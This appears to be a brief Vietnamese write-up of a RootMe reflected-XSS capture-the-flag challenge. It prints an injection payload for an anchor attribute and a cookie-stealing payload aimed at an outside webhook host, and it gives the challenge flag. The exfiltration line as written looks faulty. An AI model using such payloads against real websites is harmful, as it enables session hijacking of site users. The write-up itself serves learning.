RootMe: Challenge XSS-Reflected   Nhìn Sơ Qua Website thì chẳng có gì thú vị cả tiếp theo mình sẽ đi tìm hướng khác. Mình tìm tới phần contact và cũng thấy cái form sau qua trình nhâp thử thì mình thấy cái form đó cũng vô dụng. và mình đi đến mục price   sau khi mình xin sơ qua mình phát hiện ở mục price ở phần đường link có ?p=security ở mục nào link này cũng xuất hiện. Tới đây mình kiểm tra source code xem thử.  và mình thấy được đoạn mã trong thẻ a được comment lại và ở đề bài có nói đến tk admin nó có kiến thức bảo mật nên sẽ không nhấp vào đường link lạ. TỚi đây mình thử payload XSS vào thử trong thẻ a. **'onmouseover='alert(1)**  sau khi mình payload thì hiển thị ra thông báo tới đây mình sẽ chèn payload để lấy cookie của tk admin lên HOST của mình => 'onmouseover='document.cookie="https://webhook-test.com/0e2cd00ad6ff037694d94a334b5badf3".concat(document.cookie) - Sau khi chèn vào nó gửi lên HOST -  Tới đây mình vẫn chưa thấy được cookie mình tiến hành thêm 1 bước nữa là report lên admin   => Flag: {r3fL3ct3D_XsS_fTw}